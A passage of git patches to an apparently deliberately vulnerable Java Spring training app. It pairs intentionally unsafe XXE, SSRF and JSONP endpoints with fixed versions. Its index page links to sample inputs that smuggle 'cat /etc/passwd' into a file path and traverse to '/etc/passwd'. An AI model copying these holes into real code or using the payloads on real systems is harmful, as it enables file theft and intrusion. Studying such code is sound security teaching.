-     * http://localhost:8080/jsonp/mappingJackson2JsonView?callback=test
+     * http://localhost:8080/jsonp/vuln/mappingJackson2JsonView?callback=test
      * Reference: https://p0sec.net/index.php/archives/122/ from p0
      * Affected version:  java-sec-code test case version: 4.3.6
      *     - Spring Framework 5.0 to 5.0.6
      *     - Spring Framework 4.1 to 4.3.17
      */
-    @RequestMapping(value = "/mappingJackson2JsonView", produces = MediaType.APPLICATION_JSON_VALUE)
+    @RequestMapping(value = "/vuln/mappingJackson2JsonView", produces = MediaType.APPLICATION_JSON_VALUE)
     public ModelAndView mappingJackson2JsonView(HttpServletRequest req) {
         ModelAndView view = new ModelAndView(new MappingJackson2JsonView());
         Principal principal = req.getUserPrincipal();
@@ -102,29 +104,25 @@ public ModelAndView mappingJackson2JsonView(HttpServletRequest req) {
 
     /**
      * Safe code.
-     * http://localhost:8080/jsonp/sec?callback=test
+     * http://localhost:8080/jsonp/sec?callback_=test
      */
-    @RequestMapping(value = "/sec", produces = "application/javascript")
-    private String safecode(HttpServletRequest request) {
+    @RequestMapping(value = "/sec/checkReferer", produces = "application/javascript")
+    public String safecode(HttpServletRequest request) {
         String referer = request.getHeader("referer");
 
         if (SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist) == null) {
             return "error";
         }
-
-        String callback = request.getParameter("callback");
-        return callback + "(" + getUserInfo2JsonStr(request) + ")";
+        String callback = request.getParameter(this.callback);
+        return WebUtils.json2Jsonp(callback, getUserInfo2JsonStr(request));
     }
 
 
-    /**
-     * http://localhost:8080/jsonp/getToken
-     *
-     * @return token {"token":"115329a7-3a85-4c31-9c02-02fa1bd1fdf8","parameterName":"_csrf","headerName":"X-XSRF-TOKEN"}
-     */
-    @RequestMapping("/getToken")
-    public CsrfToken csrf(CsrfToken token) {
+    @GetMapping("/getToken")
+    public CsrfToken getCsrfToken(CsrfToken token) {
         return token;
     }
 
+
+
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/filter/JsonpFilter.java b/src/main/java/org/joychou/filter/JsonpFilter.java
new file mode 100644
index 00000000..25a72898
--- /dev/null
+++ b/src/main/java/org/joychou/filter/JsonpFilter.java
@@ -0,0 +1,102 @@
+package org.joychou.filter;
+
+
+import javax.servlet.*;
+import javax.servlet.annotation.WebFilter;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+import org.apache.commons.lang.StringUtils;
+import org.joychou.config.WebConfig;
+import org.joychou.security.SecurityUtil;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+
+/**
+ * @author JoyChou @ 2020-01-13
+ * 专门为object自动转jsonp功能配置的filter
+ */
+
+@WebFilter(filterName = "jsonpFilter", urlPatterns = "/*")
+public class JsonpFilter implements Filter {
+
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+
+    }
+
+    private final Logger logger= LoggerFactory.getLogger(this.getClass());
+
+
+    @Override
+    public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
+            throws IOException, ServletException {
+
+        HttpServletRequest request = (HttpServletRequest) req;
+        HttpServletResponse response = (HttpServletResponse) res;
+
+        String refer = request.getHeader("referer");
+        String[] jsonpReferWhitelist = WebConfig.getJsonpReferWhitelist();
+        StringBuffer url = request.getRequestURL();
+        String query = request.getQueryString();
+
+        // 如果不满足jsonp校验逻辑，则不校验
+        if ( !check(request) ) {
+            filterChain.doFilter(req, res);
+            return ;
+        }
+
+        // 校验jsonp逻辑，如果不安全，返回403页面
+        if (SecurityUtil.checkURLbyEndsWith(refer, jsonpReferWhitelist) == null ){
+            logger.info("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
+            response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+            response.getWriter().write("forbidden");
+            response.flushBuffer();
+            return ;
+        }
+
+        // 正常的refer，继续业务逻辑。
+        filterChain.doFilter(req, res);
+
+    }
+
+    /**
+     *
+     * @return true要进行jsonp安全校验，false不进行jsonp安全校验
+     */
+    private boolean check(HttpServletRequest req) {
+
+        // 如果jsonp校验的开关为false，不校验
+        if ( !WebConfig.getJsonpReferCheckEnabled() ) {
+            return false;
+        }
+
+        // 只校验GET请求
+        if ( !"GET".equals(req.getMethod()) ) {
+            return false;
+        }
+
+        // 只校验带配置里的callback参数请求
+        String reqCallback = null;
+        for (String callback: WebConfig.getJsonpCallbacks()) {
+            reqCallback = req.getParameter(callback);
+            if(StringUtils.isNotBlank(reqCallback)) {
+                break;
+            }
+        }
+        if (StringUtils.isBlank(reqCallback)){
+            return false;
+        }
+
+
+        return true;
+
+    }
+    @Override
+    public void destroy() {
+
+    }
+}
diff --git a/src/main/java/org/joychou/filter/OriginFilter.java b/src/main/java/org/joychou/filter/OriginFilter.java
index 55ebf4a3..0c40c25f 100644
--- a/src/main/java/org/joychou/filter/OriginFilter.java
+++ b/src/main/java/org/joychou/filter/OriginFilter.java
@@ -15,7 +15,7 @@
 /**
  * 推荐使用该全局方案修复Cors跨域漏洞，因为可以校验一级域名。
  * @author JoyChou @ 2019.12.19
- * 
+ *
  */
 @WebFilter(filterName = "OriginFilter", urlPatterns = "/cors/sec/originFilter")
 public class OriginFilter implements Filter {
diff --git a/src/main/java/org/joychou/filter/HttpFilter.java b/src/main/java/org/joychou/filter/ReferFilter.java
similarity index 62%
rename from src/main/java/org/joychou/filter/HttpFilter.java
rename to src/main/java/org/joychou/filter/ReferFilter.java
index 83b4ea13..14f1a618 100644
--- a/src/main/java/org/joychou/filter/HttpFilter.java
+++ b/src/main/java/org/joychou/filter/ReferFilter.java
@@ -1,6 +1,5 @@
 package org.joychou.filter;
 
-
 import javax.servlet.*;
 import javax.servlet.annotation.WebFilter;
 import javax.servlet.http.HttpServletRequest;
@@ -24,7 +23,7 @@
  *
  */
 @WebFilter(filterName = "referFilter", urlPatterns = "/*")
-public class HttpFilter implements Filter {
+public class ReferFilter implements Filter {
 
     @Override
     public void init(FilterConfig filterConfig) throws ServletException {
@@ -39,10 +38,10 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
 
         HttpServletRequest request = (HttpServletRequest) req;
         HttpServletResponse response = (HttpServletResponse) res;
-
         String refer = request.getHeader("referer");
         PathMatcher matcher = new AntPathMatcher();
         boolean isMatch = false;
+
         for (String uri: WebConfig.getReferUris()) {
             if ( matcher.match (uri, request.getRequestURI()) ) {
                 isMatch = true;
@@ -50,22 +49,28 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
             }
         }
 
-        // logger.info("[+] Referer: " + refer);
-
-        if (isMatch) {
-            if (WebConfig.getReferSecEnabled()) {
-                // Check referer for all GET requests with callback parameters.
-                for (String callback: WebConfig.getCallbacks()) {
-                    if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter(callback)) ){
-                        // If the check of referer fails, a 403 forbidden error page will be returned.
-                        if (SecurityUtil.checkURLbyEndsWith(refer, WebConfig.getReferWhitelist()) == null ){
-                            logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t"
-                                    + "Referer: " + refer);
-                            response.sendRedirect("https://test.joychou.org/error3.html");
-                            return;
-                        }
-                    }
-                }
+        if (!isMatch) {
+            filterChain.doFilter(req, res);
+            return;
+        }
+
+        if (!WebConfig.getReferSecEnabled()) {
+            filterChain.doFilter(req, res);
+            return;
+        }
+
+        // Check referer for all GET requests with callback parameters.
+
+        String reqCallback = request.getParameter(WebConfig.getBusinessCallback());
+        if ("GET".equals(request.getMethod()) && StringUtils.isNotBlank(reqCallback) ){
+            // If the check of referer fails, a 403 forbidden error page will be returned.
+            if (SecurityUtil.checkURLbyEndsWith(refer, WebConfig.getReferWhitelist()) == null ){
+                logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t"
+                        + "Referer: " + refer);
+                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+                response.getWriter().write("forbidden");
+                response.flushBuffer();
+                return;
             }
         }
 
@@ -78,4 +83,4 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
     public void destroy() {
 
     }
-}
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/util/WebUtils.java b/src/main/java/org/joychou/util/WebUtils.java
index 685340c6..b0a59bc1 100644
--- a/src/main/java/org/joychou/util/WebUtils.java
+++ b/src/main/java/org/joychou/util/WebUtils.java
@@ -5,6 +5,8 @@
 import java.io.IOException;
 import java.io.InputStream;
 
+import org.springframework.web.util.HtmlUtils;
+
 public class WebUtils {
 
     // Get request body.
@@ -23,4 +25,9 @@ public static String getCookieValueByName(HttpServletRequest request, String coo
         Cookie cookie = org.springframework.web.util.WebUtils.getCookie(request, cookieName);
         return cookie == null ? null : cookie.getValue();
     }
+
+
+    public static String json2Jsonp(String callback, String jsonStr) {
+        return HtmlUtils.htmlEscape(callback) + "(" + jsonStr + ")";
+    }
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index d144baa5..9135b5db 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -9,11 +9,12 @@ mybatis.mapper-locations=classpath:mapper/*.xml
 management.security.enabled=false
 # logging.config=classpath:logback-online.xml
 
-
+# 业务的callback参数，不支持多个
+joychou.business.callback = callback_
 
 ### check referer configuration begins ###
 joychou.security.referer.enabled = false
-joychou.security.referer.hostwhitelist = joychou.org, joychou.com
+joychou.security.referer.host = joychou.org, joychou.com
 # Only support ant url style.
 joychou.security.referer.uri = /jsonp/**
 ### check referer configuration ends ###
@@ -30,6 +31,8 @@ joychou.security.csrf.method = POST
 
 
 ### jsonp configuration begins ###  # auto convert json to jsonp
-# callback parameters name
+# referer check
+joychou.security.jsonp.referer.check.enabled = true
+joychou.security.jsonp.referer.host = joychou.org, joychou.com
 joychou.security.jsonp.callback = callback, _callback
 ### jsonp configuration ends ###
\ No newline at end of file
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 18933862..64737751 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -10,6 +10,7 @@
     <p>
         <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
         <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
+        <a th:href="@{/file/pic}">FileUpload</a>&nbsp;&nbsp;
         <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
         <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
         <a th:href="@{/sqli/jdbc/vul?username=joychou}">SqlInject</a>&nbsp;&nbsp;

From 7b187f2a5fbb8850f4efef6ce065ce231a45d425 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 14 Feb 2020 20:40:06 +0800
Subject: [PATCH 070/108] Add XXE & SSRF Vuln Code

---
 java-sec-code.iml                             |  11 +-
 pom.xml                                       |  16 +-
 .../java/org/joychou/controller/SSRF.java     |  91 +++--
 .../java/org/joychou/controller/SpEL.java     |   1 -
 src/main/java/org/joychou/controller/XXE.java | 321 ++++++++++--------
 .../java/org/joychou/filter/JsonpFilter.java  |   6 +-
 .../joychou/security/LoginSuccessHandler.java |  15 +-
 .../org/joychou/security/SSRFChecker.java     |   6 +-
 .../org/joychou/security/SecurityUtil.java    |  43 ++-
 src/main/resources/templates/login.html       |   6 +-
 10 files changed, 329 insertions(+), 187 deletions(-)

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 5a12be26..c9e18a68 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -67,8 +67,13 @@
     <orderEntry type="library" name="Maven: com.google.protobuf:protobuf-java:2.6.0" level="project" />
     <orderEntry type="library" name="Maven: com.alibaba:fastjson:1.2.24" level="project" />
     <orderEntry type="library" name="Maven: org.jdom:jdom2:2.0.6" level="project" />
-    <orderEntry type="library" name="Maven: org.dom4j:dom4j:2.1.1" level="project" />
-    <orderEntry type="library" name="Maven: com.google.guava:guava:21.0" level="project" />
+    <orderEntry type="library" name="Maven: org.dom4j:dom4j:2.1.0" level="project" />
+    <orderEntry type="library" name="Maven: jaxen:jaxen:1.1.6" level="project" />
+    <orderEntry type="library" name="Maven: com.google.guava:guava:23.0" level="project" />
+    <orderEntry type="library" name="Maven: com.google.code.findbugs:jsr305:1.3.9" level="project" />
+    <orderEntry type="library" name="Maven: com.google.errorprone:error_prone_annotations:2.0.18" level="project" />
+    <orderEntry type="library" name="Maven: com.google.j2objc:j2objc-annotations:1.1" level="project" />
+    <orderEntry type="library" name="Maven: org.codehaus.mojo:animal-sniffer-annotations:1.14" level="project" />
     <orderEntry type="library" name="Maven: commons-collections:commons-collections:3.1" level="project" />
     <orderEntry type="library" name="Maven: commons-lang:commons-lang:2.4" level="project" />
     <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpclient:4.3.6" level="project" />
@@ -193,5 +198,7 @@
     <orderEntry type="library" name="Maven: xml-resolver:xml-resolver:1.2" level="project" />
     <orderEntry type="library" name="Maven: xml-apis:xml-apis:1.4.01" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:slf4j-api:1.7.22" level="project" />
+    <orderEntry type="library" name="Maven: org.jsoup:jsoup:1.10.2" level="project" />
+    <orderEntry type="library" name="Maven: commons-io:commons-io:2.5" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index dd14d9ed..14dc18dc 100644
--- a/pom.xml
+++ b/pom.xml
@@ -62,7 +62,7 @@
         <dependency>
             <groupId>org.dom4j</groupId>
             <artifactId>dom4j</artifactId>
-            <version>2.1.1</version>
+            <version>2.1.0</version>
         </dependency>
 
 
@@ -70,7 +70,7 @@
         <dependency>
             <groupId>com.google.guava</groupId>
             <artifactId>guava</artifactId>
-            <version>21.0</version>
+            <version>23.0</version>
         </dependency>
 
         <dependency>
@@ -215,7 +215,19 @@
             <version>2.0.0</version>
         </dependency>
 
+        <!-- ssrf -->
+        <dependency>
+            <groupId>org.jsoup</groupId>
+            <artifactId>jsoup</artifactId>
+            <version>1.10.2</version>
+        </dependency>
 
+        <!-- ssrf -->
+        <dependency>
+            <groupId>commons-io</groupId>
+            <artifactId>commons-io</artifactId>
+            <version>2.5</version>
+        </dependency>
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index fca0e63a..657f25cf 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -4,6 +4,7 @@
 import com.squareup.okhttp.OkHttpClient;
 import org.apache.commons.httpclient.HttpClient;
 import org.apache.commons.httpclient.methods.GetMethod;
+import org.apache.commons.io.IOUtils;
 import org.apache.http.HttpResponse;
 import org.apache.http.HttpStatus;
 import org.apache.http.client.fluent.Request;
@@ -11,18 +12,21 @@
 import org.apache.http.impl.client.CloseableHttpClient;
 import org.apache.http.impl.client.HttpClients;
 import org.joychou.security.SecurityUtil;
-import org.springframework.stereotype.Controller;
+import org.jsoup.Jsoup;
+import org.jsoup.nodes.Document;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 
 
 import javax.imageio.ImageIO;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.*;
-import java.net.URL;
-import java.net.URLConnection;
-import java.net.HttpURLConnection;
+import java.net.*;
 
 
 /**
@@ -31,12 +35,13 @@
  * @desc    Java ssrf vuls code.
  */
 
-@Controller
+@RestController
 @RequestMapping("/ssrf")
 public class SSRF {
 
+    private static Logger logger = LoggerFactory.getLogger(SSRF.class);
+
     @RequestMapping("/urlConnection")
-    @ResponseBody
     public static String ssrf_URLConnection(HttpServletRequest request)
     {
         try {
@@ -169,9 +174,7 @@ public static void ssrf_okhttp(HttpServletRequest request) throws IOException {
      */
     @RequestMapping("/HttpClient")
     @ResponseBody
-    public static String ssrf_HttpClient(HttpServletRequest request) {
-
-        String url = request.getParameter("url");
+    public static String ssrf_HttpClient(@RequestParam String url) {
         CloseableHttpClient client = HttpClients.createDefault();
         HttpGet httpGet = new HttpGet(url);
         try {
@@ -193,26 +196,18 @@ public static String ssrf_HttpClient(HttpServletRequest request) {
 
     /**
      * Safe code.
-     * http://localhost:8080/ssrf/commonsHttpClient?url=http://www.baidu.com
+     * http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com
      *
      */
-    @RequestMapping("/commonsHttpClient")
+    @RequestMapping("/commonsHttpClient/sec")
     @ResponseBody
-    public static String commonsHttpClient(HttpServletRequest request) {
-
-        String url = request.getParameter("url");
-
-        // Security check
+    public static String commonsHttpClient(@RequestParam String url) {
         if (!SecurityUtil.checkSSRFWithoutRedirect(url)) {
             return "Bad man. I got u.";
         }
-        // Create an instance of HttpClient.
-        HttpClient client = new HttpClient();
 
-        // Create a method instance.
+        HttpClient client = new HttpClient();
         GetMethod method = new GetMethod(url);
-
-        // forbid 302 redirection
         method.setFollowRedirects(false);
 
         try {
@@ -238,19 +233,63 @@ public static String commonsHttpClient(HttpServletRequest request) {
 
     }
 
+    /**
+     * jsoup是一款Java的HTML解析器，可直接解析某个URL地址、HTML文本内容。
+     * http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com
+     *
+     */
+    @RequestMapping("/Jsoup")
+    @ResponseBody
+    public static String Jsoup(@RequestParam String url) {
+        try {
+            Document doc = Jsoup.connect(url)
+                    .userAgent(
+                            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) "
+                                    + "Chrome/64.0.3282.167 Safari/537.36")
+                    .timeout(3000)
+                    .cookie("name", "joychou") // request请求带的cookie
+                    .followRedirects(false)
+                    .execute().parse();
+        } catch (MalformedURLException e) {
+            return "exception: " + e.toString();
+        } catch (Exception e) {
+            return "exception: " + e.toString();
+        }
+
+        return "Jsoup ssrf";
+    }
+
+
+    /**
+     * 用途：IOUtils可远程获取URL图片
+     * 默认重定向：是
+     * 封装类：URLConnection
+     * http://localhost:8080/ssrf/IOUtils?url=http://www.baidu.com
+     */
+    @RequestMapping("/IOUtils")
+    public static String IOUtils(@RequestParam String url) {
+        try {
+            // IOUtils.toByteArray内部用URLConnection进行了封装
+            byte[] b = IOUtils.toByteArray(URI.create(url));
+        } catch (Exception e) {
+            return "exception: " + e.toString();
+        }
+
+        return "IOUtils ssrf";
+    }
+
 
     /**
      * Safe code.
-     * http://localhost:8080/ssrf/ImageIO_safe?url=http://www.baidu.com
+     * http://localhost:8080/ssrf/ImageIO/sec?url=http://www.baidu.com
      *
      */
-    @RequestMapping("/ImageIO_safe")
-    @ResponseBody
-    public static String ssrf_ImageIO_safecode(HttpServletRequest request) {
-        String url = request.getParameter("url");
+    @RequestMapping("/ImageIO/sec")
+    public static String ImageIOSec(@RequestParam String url) {
         try {
             URL u = new URL(url);
             if (!SecurityUtil.checkSSRF(url)) {
+                logger.error("[-] SSRF check failed. Original Url: "+ url);
                 return "SSRF check failed.";
             }
             ImageIO.read(u); // send request
diff --git a/src/main/java/org/joychou/controller/SpEL.java b/src/main/java/org/joychou/controller/SpEL.java
index 28fdafde..07be7d7e 100644
--- a/src/main/java/org/joychou/controller/SpEL.java
+++ b/src/main/java/org/joychou/controller/SpEL.java
@@ -1,6 +1,5 @@
 package org.joychou.controller;
 
-import org.springframework.expression.EvaluationContext;
 import org.springframework.expression.ExpressionParser;
 import org.springframework.expression.spel.standard.SpelExpressionParser;
 import org.springframework.web.bind.annotation.RequestMapping;
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 7347523e..1de059ce 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -1,6 +1,9 @@
 package org.joychou.controller;
 
+import org.dom4j.DocumentHelper;
 import org.dom4j.io.SAXReader;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.*;
 import javax.servlet.http.HttpServletRequest;
 
@@ -22,7 +25,7 @@
 import org.joychou.util.WebUtils;
 
 /**
- * Java xxe vul and safe code.
+ * Java xxe vuln and security code.
  *
  * @author JoyChou @2017-12-22
  */
@@ -31,26 +34,29 @@
 @RequestMapping("/xxe")
 public class XXE {
 
-    @RequestMapping(value = "/xmlReader", method = RequestMethod.POST)
-    public String xxe_xmlReader(HttpServletRequest request) {
+    private static Logger logger= LoggerFactory.getLogger(XXE.class);
+    private static String EXCEPT = "xxe except";
+
+    @RequestMapping(value = "/xmlReader/vuln", method = RequestMethod.POST)
+    public String xmlReaderVuln(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
             XMLReader xmlReader = XMLReaderFactory.createXMLReader();
-            xmlReader.parse(new InputSource(new StringReader(xml_con)));  // parse xml
-            return "ok";
+            xmlReader.parse(new InputSource(new StringReader(body)));  // parse xml
+            return "xmlReader xxe vuln code";
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
     }
 
 
-    @RequestMapping(value = "/xmlReader_fix", method = RequestMethod.POST)
-    public String xxe_xmlReader_fix(HttpServletRequest request) {
+    @RequestMapping(value = "/xmlReader/sec", method = RequestMethod.POST)
+    public String xmlReaderSec(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             XMLReader xmlReader = XMLReaderFactory.createXMLReader();
             // fix code start
@@ -58,168 +64,173 @@ public String xxe_xmlReader_fix(HttpServletRequest request) {
             xmlReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
             xmlReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
             //fix code end
-            xmlReader.parse(new InputSource(new StringReader(xml_con)));  // parse xml
+            xmlReader.parse(new InputSource(new StringReader(body)));  // parse xml
 
-            return "ok";
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+
+        return "xmlReader xxe security code";
     }
 
 
-    @RequestMapping(value = "/SAXBuilder", method = RequestMethod.POST)
-    public String xxe_SAXBuilder(HttpServletRequest request) {
+    @RequestMapping(value = "/SAXBuilder/vuln", method = RequestMethod.POST)
+    public String SAXBuilderVuln(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             SAXBuilder builder = new SAXBuilder();
-            org.jdom2.Document document = builder.build(new InputSource(new StringReader(xml_con)));  // cause xxe
-            return "ok";
+            // org.jdom2.Document document
+            builder.build(new InputSource(new StringReader(body)));  // cause xxe
+            return "SAXBuilder xxe vuln code";
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
     }
 
-    @RequestMapping(value = "/SAXBuilder_fix", method = RequestMethod.POST)
-    public String xxe_SAXBuilder_fix(HttpServletRequest request) {
+    @RequestMapping(value = "/SAXBuilder/sec", method = RequestMethod.POST)
+    public String SAXBuilderSec(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             SAXBuilder builder = new SAXBuilder();
             builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
             builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
-            org.jdom2.Document document = builder.build(new InputSource(new StringReader(xml_con)));
+            // org.jdom2.Document document
+            builder.build(new InputSource(new StringReader(body)));
 
-            return "ok";
         } catch (Exception e) {
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+
+        return "SAXBuilder xxe security code";
     }
 
-    @RequestMapping(value = "/SAXReader", method = RequestMethod.POST)
-    public String xxe_SAXReader(HttpServletRequest request) {
+    @RequestMapping(value = "/SAXReader/vuln", method = RequestMethod.POST)
+    public String SAXReaderVuln(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             SAXReader reader = new SAXReader();
-            org.dom4j.Document document = reader.read(new InputSource(new StringReader(xml_con))); // cause xxe
+            // org.dom4j.Document document
+            reader.read(new InputSource(new StringReader(body))); // cause xxe
 
-            return "ok";
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+
+        return "SAXReader xxe vuln code";
     }
 
-    @RequestMapping(value = "/SAXReader_fix", method = RequestMethod.POST)
-    public String xxe_SAXReader_fix(HttpServletRequest request) {
+    @RequestMapping(value = "/SAXReader/sec", method = RequestMethod.POST)
+    public String SAXReaderSec(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             SAXReader reader = new SAXReader();
             reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
             reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
-            org.dom4j.Document document = reader.read(new InputSource(new StringReader(xml_con)));
-
-            return "ok";
+            // org.dom4j.Document document
+            reader.read(new InputSource(new StringReader(body)));
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+        return "SAXReader xxe security code";
     }
 
-    @RequestMapping(value = "/SAXParser", method = RequestMethod.POST)
-    public String xxe_SAXParser(HttpServletRequest request) {
+    @RequestMapping(value = "/SAXParser/vuln", method = RequestMethod.POST)
+    public String SAXParserVuln(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             SAXParserFactory spf = SAXParserFactory.newInstance();
             SAXParser parser = spf.newSAXParser();
-            parser.parse(new InputSource(new StringReader(xml_con)), new DefaultHandler());  // parse xml
+            parser.parse(new InputSource(new StringReader(body)), new DefaultHandler());  // parse xml
 
-            return "test";
+            return "SAXParser xxe vuln code";
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
     }
 
 
-    @RequestMapping(value = "/SAXParser_fix", method = RequestMethod.POST)
-    public String xxe_SAXParser_fix(HttpServletRequest request) {
+    @RequestMapping(value = "/SAXParser/sec", method = RequestMethod.POST)
+    public String SAXParserSec(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             SAXParserFactory spf = SAXParserFactory.newInstance();
             spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
             spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
             SAXParser parser = spf.newSAXParser();
-            parser.parse(new InputSource(new StringReader(xml_con)), new DefaultHandler());  // parse xml
-            return "test";
+            parser.parse(new InputSource(new StringReader(body)), new DefaultHandler());  // parse xml
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+        return "SAXParser xxe security code";
     }
 
 
-    @RequestMapping(value = "/Digester", method = RequestMethod.POST)
-    public String xxe_Digester(HttpServletRequest request) {
+    @RequestMapping(value = "/Digester/vuln", method = RequestMethod.POST)
+    public String DigesterVuln(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             Digester digester = new Digester();
-            digester.parse(new StringReader(xml_con));  // parse xml
-
-            return "test";
+            digester.parse(new StringReader(body));  // parse xml
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
+        return "Digester xxe vuln code";
     }
 
-    @RequestMapping(value = "/Digester_fix", method = RequestMethod.POST)
-    public String xxe_Digester_fix(HttpServletRequest request) {
+    @RequestMapping(value = "/Digester/sec", method = RequestMethod.POST)
+    public String DigesterSec(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
+            String body = WebUtils.getRequestBody(request);
+            logger.info(body);
 
             Digester digester = new Digester();
             digester.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             digester.setFeature("http://xml.org/sax/features/external-general-entities", false);
             digester.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
-            digester.parse(new StringReader(xml_con));  // parse xml
+            digester.parse(new StringReader(body));  // parse xml
 
-            return "test";
+            return "Digester xxe security code";
         } catch (Exception e) {
-            System.out.println(e);
-            return "except";
+            logger.error(e.toString());
+            return EXCEPT;
         }
     }
 
 
-    // 有回显的XXE
-    @RequestMapping(value = "/DocumentBuilder_return", method = RequestMethod.POST)
-    public String xxeDocumentBuilderReturn(HttpServletRequest request) {
+    // 有回显
+    @RequestMapping(value = "/DocumentBuilder/vuln01", method = RequestMethod.POST)
+    public String DocumentBuilderVuln01(HttpServletRequest request) {
         try {
-            String xml_con = WebUtils.getRequestBody(request);
-            System.out.println(xml_con);
-
+            String body = WebUtils.getRequestBody(request);
